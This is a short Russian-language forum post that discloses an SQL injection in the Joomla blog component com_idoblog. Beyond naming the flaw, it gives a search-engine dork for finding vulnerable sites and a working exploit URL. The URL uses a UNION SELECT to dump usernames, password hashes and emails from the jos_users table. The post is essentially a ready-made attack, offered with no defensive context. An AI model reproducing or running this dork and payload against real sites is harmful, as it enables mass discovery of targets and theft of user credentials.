Показать сообщение отдельно

  #4  
Старый 02.01.2011, 02:40
JOSSe7
Guest
Сообщений: n/a
Провел на форуме:
1686

Репутация: 0
По умолчанию

Уязвимость: SQL Injection Vulnerability

Компонент: com_idoblog

Dork: inurl:"com_idoblog"

Language: php

http://extensions.joomla.org/extensions/news-production/blog/9218

Exploit:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
 
Ответить с цитированием